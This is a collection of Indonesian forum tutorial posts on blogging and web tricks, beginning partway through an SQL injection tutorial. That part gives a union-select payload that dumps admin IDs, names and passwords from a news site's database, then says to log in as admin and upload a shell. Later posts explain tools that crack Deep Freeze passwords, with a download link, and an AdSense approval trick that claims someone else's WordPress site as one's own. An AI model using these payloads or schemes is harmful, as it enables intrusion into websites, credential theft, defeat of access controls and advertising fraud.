contoh kata yang keluar adalah adminID,Name,password

maka
/news.php?=id=100+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang

ket: 0x3a sama dengan : <- titik dua


Ketujuh
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
ENJOY........

created : http://www.kimmonosz.co.cc/2009/11/tutorial-sql-injection.html
 

Offline Blogging Dengan Windows Live Writer

Apa itu Window Live Writer?
Window Live Writer adalah sebuah tool buatan Microsoft untuk para Blogger agar blogging / ngeblog secara offline. Bagi anda yang baru di dunia Blogger (termasuk saya sebelum tahu tips ini, hehe..), mungkin anda harus login dulu ke akun Blogger anda untuk membuat sebuah postingan. Tapi karena sekarang sudah banyak tool gratisan untuk blogging secara offline seperti Scribefire, Post2blog, Wbloggar, dan Window Live Writer yang akan kita bahas ini, cara itu sudah dianggap kuno oleh para master Blogger. Jadi sekarang jamannya Offline Blogging alias membuat artikelnya secara offline dengan tool lalu tinggal klik Publish kalau sudah dalam kondisi online. Tertarik mencoba?

Berikut Keunggulan Dari Window Live Writer:

1. Bisa Offline Blogging (pastinya!)
Dengan Offline Blogging kita bisa menghemat biaya pemakaian internet dan waktu, apalagi buat yang online di warnet. Uang keluarnya jadi berkurang. Hehehe…!

2. Tampilannya Menarik




3. Tool Editor Window Live Writer Sangat Lengkap
Jika kita menggunakan Window Live Writer, maka kita akan seperti menggunakan Microsoft Word karena tool editor nya sangat lengkap. Jadi untuk urusan mengedit gambar, membuat tabel, sangat lah mudah dengan Window Live Writer ini.

4. Image Editor Yang Mantap!
Hanya dengan satu kali klik, kita bisa membuat efek gambar yang sangat menarik. Tentunya ini akan sanagt berguna karena kita bisa menghemat waktu. Efek2 yang bisa dihasilkan adalah Drop shadow, Photopaper, Reflection, Rounded Corner, Water mark, Black and White, Sepia tone, dll.

5. Upload Gambar Secara Otomatis
Anda tidak perlu mengupload gambar yang akan diposting terlebih dahulu karena Window Live Writer akan mengupload secara otomatis ke Picasa Web Album.

6. Multi Preview Editor
Anda bisa memilih versi HTML atau versi biasa (WYSUWYG), serta web preview tampilan di browser.

7. Bisa Menambah Plugin
Seperti Firefox yang terkenal dengan fitur Add-Ons, Window Live Writer juga memiliki fitur fasilitas Add Plugin.

Berikut Link Download Untuk Window Live Writer:

1. Software Window Live Writer: http://download.live.com/writer

2. Download Plugin: http://gallery.live.com

Lalu gimana jika kita akan membuat read more? Apa bisa dengan Window Live Writer ini?
Tentu bisa… Kalau di Blogger kita memilih tab edit html untuk mengatur letak kode read more, di Window Live Writer kita pilih tab Source. Udah tahu kan cara membuat read more? Kalau belum, klik disini untuk membaca artikelnya.

Selamat mencoba…
 

Cara Memasang Widget Share The Love

Share The Love merupakan salah satu widget sharing & bookmarking. Widget Share The Love memilikI tampilan yang sangat menariK. Dengan menggunakan widget ini kita bisa membagikan atau mengirimkan artikel ke 18 situs jejaring sosial. Yaitu Stumbleupon, Digg, Reddit, Delicious, Yahoobuzz, Blinklist, Technorati, Facebook, Twitter, Myspace, Mixx, Scriptstyle, Designfloat, Comfeed, Newsvine, Linkedin, Google, Friendfeed. Lalu gimana cara memasang widget itu blog? Mau tau?

Berikut Cara Memasang Widget Share The Love:

1. Login ke akun Blogger anda

2. Plih Layout > Edit HTML, lalu centang Expand Widget Template

3. Cari kode ]]>, lalu paste kode css berikut tepat di atasnya:


Code:
/* start share the love css by tips-blogger-zacky.blogspot.com
----------------------------------------------- */
div.sexy-bookmarks{margin:20px 0 0 0; border: 0;outline: none;clear:both !important}
div.sexy-bookmarks-expand{height:29px; overflow:hidden}
.sexy-bookmarks-bg-sexy, .sexy-bookmarks-bg-love{background-image:url('http://img31.imageshack.us/img31/176/sexytrans.png') !important; background-repeat:no-repeat}
div.sexy-bookmarks-bg-love{padding:26px 0 0 10px; background-position:left -1148px !important}
div.sexy-bookmarks ul.socials{width:100% !important; margin:0 !important; padding:0 !important; float:left}
div.sexy-bookmarks ul.socials li{display:inline !important; float:left !important; list-style-type:none !important; margin:0 !important; height:29px !important; width:60px !important; cursor:pointer !important; padding:0 !important}
div.sexy-bookmarks ul.socials li:before, div.sexy-bookmarks ul.socials li:after, div.sexy-bookmarks ul.socials li a:before, div.sexy-bookmarks ul.socials li a:after{content:none !important}
div.sexy-bookmarks ul.socials a{display:block !important; width:60px !important; height:29px !important; text-indent:-9999px !important; background-color:transparent !important}
div.sexy-bookmarks ul.socials a:hover{background-color:transparent !important}
.sexy-digg, .sexy-digg:hover, .sexy-reddit, .sexy-reddit:hover, .sexy-stumbleupon, .sexy-stumbleupon:hover, .sexy-delicious, .sexy-delicious:hover, .sexy-yahoobuzz, .sexy-yahoobuzz:hover, .sexy-blinklist, .sexy-blinklist:hover, .sexy-technorati, .sexy-technorati:hover, .sexy-facebook, .sexy-facebook:hover, .sexy-twitter, .sexy-twitter:hover, .sexy-myspace, .sexy-myspace:hover, .sexy-mixx, .sexy-mixx:hover, .sexy-scriptstyle, .sexy-scriptstyle:hover, .sexy-designfloat, .sexy-designfloat:hover, .sexy-comfeed, .sexy-comfeed:hover, .sexy-newsvine, .sexy-newsvine:hover, .sexy-linkedin, .sexy-linkedin:hover, .sexy-google, .sexy-google:hover, .sexy-friendfeed, .sexy-friendfeed:hover{background:url('http://img512.imageshack.us/img512/3131/sexysprite.png') no-repeat !important;border: 0;outline: none;}
.sexy-digg{background-position:-980px bottom !important}
.sexy-digg:hover{background-position:-980px top !important}
.sexy-reddit{background-position:-700px bottom !important}
.sexy-reddit:hover{background-position:-700px top !important}
.sexy-stumbleupon{background-position:-630px bottom !important}
.sexy-stumbleupon:hover{background-position:-630px top !important}
.sexy-delicious{background-position:-1190px bottom !important}
.sexy-delicious:hover{background-position:-1190px top !important}
.sexy-yahoobuzz{background-position:-1120px bottom !important}
.sexy-yahoobuzz:hover{background-position:-1120px top !important}
.sexy-blinklist{background-position:-1260px bottom !important}
.sexy-blinklist:hover{background-position:-1260px top !important}
.sexy-technorati{background-position:-560px bottom !important}
.sexy-technorati:hover{background-position:-560px top !important}
.sexy-myspace{background-position:-770px bottom !important}
.sexy-myspace:hover{background-position:-770px top !important}
.sexy-twitter{background-position:-490px bottom !important}
.sexy-twitter:hover{background-position:-490px top !important}
.sexy-facebook{background-position:-1330px bottom !important}
.sexy-facebook:hover{background-position:-1330px top !important}
.sexy-mixx{background-position:-840px bottom !important}
.sexy-mixx:hover{background-position:-840px top !important}
.sexy-scriptstyle{background-position:-280px bottom !important}
.sexy-scriptstyle:hover{background-position:-280px top !important}
.sexy-designfloat{background-position:-1050px bottom !important}
.sexy-designfloat:hover{background-position:-1050px top !important}
.sexy-newsvine{background-position:left bottom !important}
.sexy-newsvine:hover{background-position:left top !important}
.sexy-google{background-position:-210px bottom !important}
.sexy-google:hover{background-position:-210px top !important}
.sexy-comfeed{background-position:-420px bottom !important}
.sexy-comfeed:hover{background-position:-420px top !important}
.sexy-linkedin{background-position:-70px bottom !important}
.sexy-linkedin:hover{background-position:-70px top !important}
.sexy-friendfeed{background-position:-1750px bottom !important}
.sexy-friendfeed:hover{background-position:-1750px top !important}
.sexy-link{ margin-left:25px; float:left}
.sexy-link A{padding:10px 0; width:470px; text-align:right; border:0; outline:none}
/* end share the love css by tips-blogger-zacky.blogspot.com
----------------------------------------------- */
4. Selanjutnya cari kode , lalu paste kode berikut tepat di atasnya:

Code:
5. Langkah terakhir, cari kode . Paste kode berikut tepat di bawahnya:

5. Klik Save Template untuk menyimpan perubahan.

Selamat mencoba...

================================================== ========
sumber: http://tips-blogger-zacky.blogspot.c...hare-love.html
 

Beberapa Trick Youtube

ini trik sudah lama.siapa tau masih berguna dan bermanfaat

1. High Quality Videos

tambahin aja dibelakang URL &fmt=18 atau &fmt=22

jika ada &feature= seperti ini


Code:
http://www.youtube.com/watch?v=lfLwdq36JE8&feature=rec-LGOUT-real_rn-HM
hapus dulu aja menjadi http://www.youtube.com/watch?v=lfLwdq36JE8 sekarang tgl tambahin

misal : http://www.youtube.com/watch?v=lfLwdq36JE8
jadi : http://www.youtube.com/watch?v=lfLwdq36JE8&fmt=18

2. Nampilin HQ di menu youtube

tambahin aja dibelakang URL &ap=%2526fmt%3D18 atau &ap=%2526fmt%3D22

jika ada &feature= seperti ini

Code:
http://www.youtube.com/watch?v=lfLwdq36JE8&feature=rec-LGOUT-real_rn-HM
hapus dulu aja menjadi http://www.youtube.com/watch?v=lfLwdq36JE8 sekarang tgl tambahin
misal :
Code:
http://www.youtube.com/watch?v=lfLwdq36JE8
jadi :
Code:
http://www.youtube.com/watch?v=lfLwdq36JE8&ap=%2526fmt%3D18
3. Bypass youtube regional filter [Fullscreen Browser]

Code:
Klo ada beberapa video youtube yg ga bisa kita access maka ganti http://www.youtube.com/watch?v= dengan http://www.youtube.com/v/
4. Download Video tanpa Software

Ganti:
Code:
http://www.youtube.com/watch?v=
dengan:
Code:
http://www.kickyoutube.com/watch?v=
nanti di situ ada pilihan format
# MP4
# FLV
# HD
# AVI
# MPG
# 3GP
# IPHONE
# PSP
# MP3
# OGG
# GIF

pilih terus GO, ntar muncul tulisan Down klik kanan save link as


maaf ya klo ga berguna.cuman ingin berbagi aja...
 

Cara Membuat Tabel Di Blog

Tabel merupakan sebuah elemen yang berfungsi untuk mengelompokkan beberapa variabel dengan variabel lain ke dalam sebuah kotak sehingga mudah untuk memahami pembagiannya (itu defenisi menurut saya, menurut anda gimana?). Bagi anda para Blogger yang memilki blog untuk keperluan bisnis tabel ini akan sangat berguna untuk menampilkan daftar harga dan jenis barang yang ditawarkan. Untuk keperluan yang lain juga boleh. Maka dari itu, di tips kali ini saya akan menjelaskan cara membuat tabel tersebut. Mau tau?

Untuk membuat tabel di blog atau website kita menggunkan kode HTML, misal
.....
. Didalamnya kita bisa memasukkan beberapa atribut. Di antaranya:

bgcolor : untuk mengatur warna background/warna latar belakang tabel. Penempatan kodenya: bgcolor="kode warna" . Klik disini untuk mengetahui kode warna HTML.

align : untuk mengatur perataan teks pada tabel (rata kiri, tengah, rata kanan, atau rata kiri-kanan)Penempatan kodenya: align="left"|"center"|"right"

cellpadding : untuk mengatur jarak antara tepi cell dengan isi cell di dalam sebuah tabel. Penempatan kodenya: cellpadding="pixel"

border : untuk mengatur tingkat ketebalan garis tepi pada tabel. Penempatan kodenya: border="pixel"

cellspacing : untuk mengatur jarak antara cell. Penempatan kodenya: cellspacing="pixel"

height : untuk mengatur tinggi tabel. Penempatan kodenya: height="pixel"

width : untuk mengatur lebal tabel. Penempatan kodenya: width="pixel"

Kode yang terbentuk adalah seperti ini:

bgcolor="kode warna" border="pixel" cellpadding="pixel" cellspacing="pixel" height="pixel"|"%" width="pixel"|"%"> .....................




Kita juga bisa memasukkan beberapa elemen ke dalam elemen tabel, yaitu caption, TH (Table Header), TR (Table Row), dan TD (Table Division).

Elemen caption berfungsi untuk membuat judul tabel. Elemen ini mempunyai atribut align dengan nilai top (judul di atas tabel), dan bottom (judul di bawah tabel).

Kode yang terbentuk adalah seperti ini:


.................



Elemen TR (Table Row) berfungsi untuk membuat baris. Elemen ini letaknya di dalam elemen tabel. Atribut yang bisa di pakai di dalam TR antara lain:

align : untuk mengatur perataan teks pada tabel (rata kiri, tengah, rata kanan, atau rata kiri-kanan)Penempatan kodenya: align="left"|"center"|"right"

valign : untuk mengatur posisi vertikal teks. Penempatan kodenya: valign="top"|"middle"|"bottom"

bgcolor : untuk mengatur warna background/warna latar belakang tabel. Penempatan kodenya: bgcolor="kode warna" . Klik disini untuk mengetahui kode warna HTML.

Kode yang terbentuk adalah seperti ini:


bgcolor="kode warna"
valign="top"|"middle"|"bottom">
.................



Elemen TH (Table Header) berfungsi sebagai header cell pada sebuah kolom tabel. Atribut yang bisa di pakai di dalam TH antara lain:

align : untuk mengatur perataan teks pada tabel (rata kiri, tengah, rata kanan, atau rata kiri-kanan)Penempatan kodenya: align="left"|"center"|"right"

valign : untuk mengatur posisi vertikal teks. Penempatan kodenya: valign="top"|"middle"|"bottom"

bgcolor : untuk mengatur warna background/warna latar belakang tabel. Penempatan kodenya: bgcolor="kode warna" . Klik disini untuk mengetahui kode warna HTML

colspan : untuk mengatur kolom. Penempatan kodenya : colspan="nomor"

rowspan : untuk mengatur baris. Penempatan kodenya : rowspan="nomor"

Kode yang terbentuk adalah seperti ini:


bgcolor="kode warna"
valign="top"|"middle"|"bottom"
colspan="nomor" rowspan="nomor">
.................



Elemen TD (Table Division) adalah elemen untuk membuat kolom. Atribut yang bisa di pakai di dalam TD antara lain:

align : untuk mengatur perataan teks pada tabel (rata kiri, tengah, rata kanan, atau rata kiri-kanan)Penempatan kodenya: align="left"|"center"|"right"

valign : untuk mengatur posisi vertikal teks. Penempatan kodenya: valign="top"|"middle"|"bottom"

bgcolor : untuk mengatur warna background/warna latar belakang tabel. Penempatan kodenya: bgcolor="kode warna" . Klik disini untuk mengetahui kode warna HTML.

colspan : untuk mengatur kolom. Penempatan kodenya : colspan="nomor"

rowspan : untuk mengatur baris. Penempatan kodenya : rowspan="nomor"

Kode yang terbentuk adalah seperti ini:


bgcolor="kode warna"
valign="top"|"middle"|"bottom"
colspan="nomor" rowspan="nomor">
.................


Berikut kode membuat tabel sederhana:


Contoh Tabel Sederhana
Hasilnya: Contoh Tabel Sederhana Jika anda ingin tulisannya berada ditengah, tambahkan kode align="center" setelah kode
.
Jika anda ingin menebalkan border nya, ganti nilai border="1" dengan nilai yang lebih tinggi. Contoh: border="5"

Contoh:


Contoh center & border="5"


Hasilnya:


Contoh center & border="5"

Jika anda ingin menambah kolom, misalnya 3 kolom, kodenya seperti ini:


Contoh Kolom 1

Contoh Kolom 2

Contoh Kolom 3


Hasilnya:






Contoh Kolom 1 Contoh Kolom 2 Contoh Kolom 3

Jika anda ingin menambah baris, misalnya 2 baris, kodenya seperti ini:


Contoh Kolom 1

Contoh Kolom 2

Contoh Kolom 3

Contoh Baris 2

Contoh Baris 2

Contoh Baris 2


Hasilnya:












Contoh Kolom 1 Contoh Kolom 2 Contoh Kolom 3
Contoh Baris 2 Contoh Baris 2 Contoh Baris 2

Jika ingin memberi warna tabel, kodenya seperti ini:


Contoh Kolom 1

Contoh Kolom 2

Contoh Kolom 3

Contoh Baris 2

Contoh Baris 2

Contoh Baris 2


Hasilnya:












Contoh Kolom 1 Contoh Kolom 2 Contoh Kolom 3
Contoh Baris 2 Contoh Baris 2 Contoh Baris 2

Huft… Cape’ nih… Lanjut………!!!!!

Ini contoh terakhir:

Misalnya anda adalah Penjual Makanan Online (emang ada? :f anggap aja ada ya.. :r ok, lanjuutt…!). Anda ingin membuat daftar makanan yang unik dan menarik dengan membuat tabel seperti yang saya contohkan berikut:


























Warung Online Mpok InezDaftar Menu & Harga
No. Menu Harga
1. Nasi Uduk Rp 5000
2. Pecel Lele Rp 3500
3. Teh Telor GRATIS!!!


"Wow! Kalau yang itu gimana bang Zacky? :f Inez nggak tau nih.. Bantuin donk…"

Duh Mpok Inez :$, gitu aja repot! Hehehe… Begini kode nya:

Warung Online Mpok Inez
Daftar Menu & Harga
No. Menu Harga
1. Nasi Uduk Rp 5000
2. Pecel Lele Rp 3500
3. Teh Telor GRATIS!!!


Gimana? Mpok udah kan? Kalau begitu sekarang saya minta menu yang gratis ya, yang Teh Telor itu lho.. :$ Cepat ya Mpookk,,, :)

Lho? Kok jadinya malah ngobrol dengan Mpok Inez? :r :r Ok, saya kembali ke anda para pembaca setia ku.. Hikz.. Hikz..!

Gimana? Saya membuat artikel yang SANGAT SINGKAT ini dengan sangat susah payah, jadi jangan lupa dikasih pujian ya :k, eh komentar… :O

Ok, selamat berkreasi dengan tabel anda…
 

Cara Membuat Tombol Back to Top Blogger

Malam semuanya! Kali ini saya akan menjelaskan satu tips yang sangat mudah dan penting, yaitu cara membuat tombol Back to Top.
Kenapa sangat mudah? Karena anda akan saya kasih tau tips nya.. :O
Kenapa Penting? Karena bisa mempercepat pengunjung untuk kembali ke bagian paling atas halaman blog kita tanpa harus "scrolling". Dengan begitu mereka bisa dengan mudah mencari navigasi lain blog untuk berlama-lama disana. Hal ini merupakan salah satu cara membuat pengunjung merasa betah dan nyaman di blog. Mau tau caranya?

Berikut Cara Membuat Tombol Back to Top:

1. Login ke akun Blogger anda

2. Plih Layout > Edit HTML

3. Paste kode berikut sebelum kode ]]> :

#backtotop {
padding:5px;
position:fixed;
bottom:10px;right:10px;
cursor:pointer;
}



4. Selanjutnya, cari kode . Paste kode berikut di atasnya:

back to top



Ganti LINK-GAMBAR dengan link gambar back to top anda.

5. Langkah terakhir, cari kode . Paste kode berikut di bawahnya:






5. Terakhir, klik Save Template untuk menyimpan perubahan.

Selamat mencoba...

================================================== =============
 

Cara Membuat Read More Automatis + Thumbnail (Versi 3)

Hmm.. Setelah versi 1 dan 2, sekarang ada lagi read more versi 3. Kalau di read more versi 1 dan 2, banyaknya abstraksi postingan di atur dari tempat membuat postingan yaitu dengan cara meletakkan abstraksi sebelum kode (versi 1) atau (versi 2) dan sisanya sebelum kode . Lain halnya pada read more versi 3 ini yang kita bisa mengaturnya langsung di saat mengedit template kita dengan menentukan jumlah karakter yang akan menjadi abstraksi postingan, inilah yang dinamakan automatis. Selain itu, kita juga bisa menampilkan thumbnail dari gambar pertama postingan. Wow, menarik juga nih! Mau tau gimana caranya?

Berikut Cara Membuat Read More Automatis +Thumbnail:

1. Seperti biasa, login dulu ke akun Blogger anda

2. Pilih Layout > Edit HTML

3. Letakkan kode berikut di di bawah kode







Note:
var thumbnail_mode = "float"; = Menentukan posisi thumnail
summary_noimg = 500; = Jumlah karakter bila tidak menggunakan thumbnail
summary_img = 400; = Jumlah karakter bila menggunakan thumbnail
img_thumb_height = 125; =Tinggi thumbnail
img_thumb_width = 120; = Lebar thumbnail

4. Klik Save Template

5. Tetap di Edit HTML, lalu centang Expand Widget Template

6. Cari kode , lalu ganti kode tersebut dengan kode berikut:






READ MORE -





Tulisan READ MORE - bisa anda ganti sesuai keinginan.

7. Save lagi template nya.

Siap deh semunya. Sekarang tinggal anda coba, Ok! Have a nice dream…! Hehehe…!
 

Mengatasi Lupa Password Deep Freeze 5 dan 6

emmm mungkin sebelum di post di sini udh ada yang pernah baca masalah artikel ini

coz di sini blm ada dr pada ngangur nd jd basi kwkokokkook mendinagn share aja dehhhh

langsung gan

sesuai dengan dinamika dan perkembangan jaman – banyak tips dan tools baru bermunculan ternyata termasuk juga untuk teknik untuk menjebol password Deep Freeze. Jika sebelumnya ada unfreezer untuk

Deepfreeze 5 tetapi reset password harus dilakukan secara manual untuk Deepfreeze 6, maka sekarang ini beberapa tools penjebol password bahkan sudah bisa dipake untuk mereset password Deep Freeze versi 6 dengan sedemikian mudah dan cepat.

Kalau anda admin warnet dan sebangsanya, saya sarankan anda mengikuti perkembangan ini, karena tools ini benar-benar lumayan mengerikan. Bahkan kesan saya malah lebih mak nyus dari Unfreezer untuk DF 5.

Ada dua tools setidaknya setahu saya yang bisa dipakai untuk menjebol password DF 6 nyaris dengan seketika tanpa perlu susah payah. Ngeri deh

TOOLS PERTAMA bernama Anti Deepfreeze, kelihatannya karya programmer Arab.

Tampilannya seperti ini :



id=”BLOGGER_PHOTO_ID_5389448487420654082″ border=”0″ />

Cara menggunakannya sangat mudah, Tinggal pilih versi Deepfreeze lalu klik tombol Apply. Kemudian klik gambar icon Deepfreeze di taskbar ( Ctrl + Shift ) sambil klik icon .

Jika ada kotak password biarkan kosong, langsung masuk saja. Anda akan dibiarkan masuk konfigurasi Deepfreeze tanpa password

TOOLS KEDUA bernama Uninstall Deepfreeze, karya programmer Vietnam. Kalo program sebelumnya pake bahasa Inggris , program yang ini berbahasa Vietnam.

Tampilannya seperti ini :






Cara memakainya juga mudah meskipun berbahasa Vietnam, klik tombol Login, sampai tombol Login tidak aktif dan tombol Crack berubah menjadi aktif. Kemudian klik tombol Crack.

Langkah selanjutnya sama. Masuk ke file konfigurasi DeepFreeze dengan Ctrl+ Shift + klik icon DF atau cara lain. Bila ada kotak password abaikan, langsung masuk saja.

Semua cara ini dilakukan di Normal Windows, tetapi memang butuh restart komputer.
Sekali lagi, karena potensi dua tools ini agak tidak mengenakkan buat admin warnet cs, saya himbau rekan2 admin lebih memperhatikan masalah ini dengan menambah proteksi DF dengan tools yang lain. Meskipun
memang yang namanya program apapun tetap ada kemungkinan ditembus passwordnya.

================================================== =========

DOWNLOAD FILE NYA DI SINI

http://www.ziddu.com/download/679804...anisx.zip.html

Gunakanlah alat bantu ini dengan bijaksana.

Bukan cuma admin, user warnet juga sebaiknya berhati-hati karena aneka script, virus, keylogger, program aneh-aneh bisa dimasukkan oleh siapa saja di warnet-warnet. Alamax daku sendiri bisa ikutan pusing

kalo main di warnet.

SALAM

================================================== ===============
Sumber :

http://lovepassword.blogspot.com/200...eepfreeze.html
 

Operator Google

Tanda Kutip ---> "
Google Mencari Eksak Kata-Kata Bersangkutan
Contoh
Code:
"indonesian hacker"
allinanchor:
Mencari Semua Istilah Dalam Teks Keterangan Link Ke Website Lain
Contoh
Code:
allinanchor:hacker
allintext:
Sebagai Hasil Ditampilkan Website Yang Berisi Semua Text Yang Dicari
Contoh
Code:
allintext:teknik hacking
allintitle:
Menemukan Wibsite, Di Mana Semua Istilah Yang Dicari Ada Dalam Judul
Contoh
Code:
allintitle:deface
allinurl:
Semua Istilah yang Dicari Ada Dalam URL
Contoh
Code:
allinurl:indonesian hacker forum
author:
Menemukan Tulisan-Tulisan Karya Penulis Tertentu
Contoh
Code:
author:Onno W. Purbo
cache:
Melacak Website Yang Ada Dalam Google-cache
Contoh
Code:
cache:www.indonesianhacker.com
define:
Mencari Arti Istilah Bidang Tertentu Dan Arti Singkatan
Contoh
Code:
define:SQL
ext:
Mencari Dokuments Dalam Format File Tertentu
Contoh
Code:
backdoor ext:pdf
filetype:
Sama Fungsinya Dengan Operator ext:
Contoh
Code:
phising filetype:pdf
group:
Mencari Tulisan Dalam Newsgroup Tertentu
Contoh
Code:
indonesian hacker group:de.newsuser.info
inanchor:
Istilah Yang Dicari Dalam Teks Keterangan Links Ke Website Lain
Contoh
Code:
inanchor:linux
info:
Mendapatkan Informasi Mengenai Sebuah Website Tertentu
Contoh
Code:
info:www.indonesianhacker.org
insubject:
Menemukan Tulisan Dengan Judul Berisi Istilah Yang Dicari
Contoh
Code:
insubject:google
intitle:
Menemukan Dokuments Dengan Judul Berisi Istilah Yang Dicari
Contoh
Code:
intitle:backtrack
inurl:
Melacak Wibsite Dengan URL Yang Berisi Istilah Yang Dicari
Contoh
Code:
inurl:cracking
link:
Menampilkan Website Berisi Link Ke URL Bersangkutan
Contoh
Code:
link:www.indonesianhacker.org
location:
Mencari Tulisan Berisi Istilah Yang Dicari Dalam Google News Dari Negara Bersangkutan
Contoh
Code:
jasakom location:jakarta
related:
Menampilkan Website Yang Serupa Dengan URL Bersangkutan
Contoh
Code:
related:www.indonesianhacker.org
site:
Membatasi Pencarian Istilah Bersangkutan Pada Sebuah Website
Contoh
Code:
Hacking site:www.indonesianhacker.org
S'moga Bermanfaat
 

Cara mudah di approve Google Adsence

sebelumnya ini udah di post di forum sebelah... nie trik bagi ya belum tau aja ya??

Tahap - Tahapnya :

1. Buat Email di GMAIL.



Gmail merupakan satu layanan email gratis dari google, kenapa harus gmail? kok bukan email gratisan yang laen? simple aja, kalo anda punya toko, trus punya produk promosi, tetapi ada orang dari toko sebelah pengen barang anda gimana perasaan anda?, nah gitu juga google, gak 100% bener, tapi google pasti akan seneng kalo kita manfaatin produk mereka untuk dapetin juga produk mereka.

2. Buka situs kumpulan artikel terkenal di internet, atau bisa cari dengan bantuan google dengan keyword Free Articles sebagai contoh saya memakai isnare.com.







3. Lihat list artikel terbaru pada sisi kiri Recently Added Articles, dan cari judul artikel yang pendek / tidak lebih dari 2 baris. saya ambil contoh How Do I Lose My Love Handles?







4. Buka Google.com harus .com untuk memperluas pencarian dalam bahasa inggris. dan masukkan kata kunci yang sudah kita dapatkan dari isnare.com tadi ditambah dengan keyword powered by wordpress untuk mempersempit pencarian hanya website yang dibuat dengan wordpress saja yang muncul.






5. Disinilah point pentingnya Kita mencari website yang dibuat dengan wordpress yang belum memiliki adsense dan selalu di update (lihat pada tanggal terakhir postingnya) minimal 1 bulan dibelakang, jangan mengambil website pada halaman awal, tetapi carilah di halaman ke 10 s/d. 20 keatas.






sebagai contoh saya mengambil website dihalaman ke 28 dan website secretlyironic.com






6. Kita buka website tersebut dan VIOLLA!!, websitenya belum ada adsense sama sekali. cocok!
7. Daftarkan segera di Google Adsense, buka Google.com/adsense
8. Isi dengan data kita dan nama website tersebut, INGAT! Nama HARUS sama dengan KTP untuk mempermudah dalam pencairan cek. dan gunakan email yang sudah kita buat tadi di gmail.com
9. Jika semua sudah diproses dan selesai sampai di Thank you for your interest in Google Adsense.., maka kita cuma bisa berharap dan berdoa. proses ini gak akan memakan waktu lama, hanya butuh beberapa jam saja.






dan hasilnya beberapa jam kemudian??

Perhatikan disebelah kanan pada tanggal email masuk dari gmail, dan email masuk dari google adsense










CATATAN :

* Jangan Pernah bermain curang di GA, karena begitu sekali anda bermain curang, maka google tidak akan memberi ampun untuk anda mendapatkan account GA lagi, kecuali menggunakan identitas orang lain.




credit to : kaori@kaskus



trik diatas udah gwa coba ndiri n skarang gwa udah punya 3 akun GA

ini bukti blog gwa yg udah ada adsense-nya httP://www.newbiekids4share.co.cc/ (blog jelek ga keurus lagi... )

slamat mencoba n GOOD LUCKKK!!!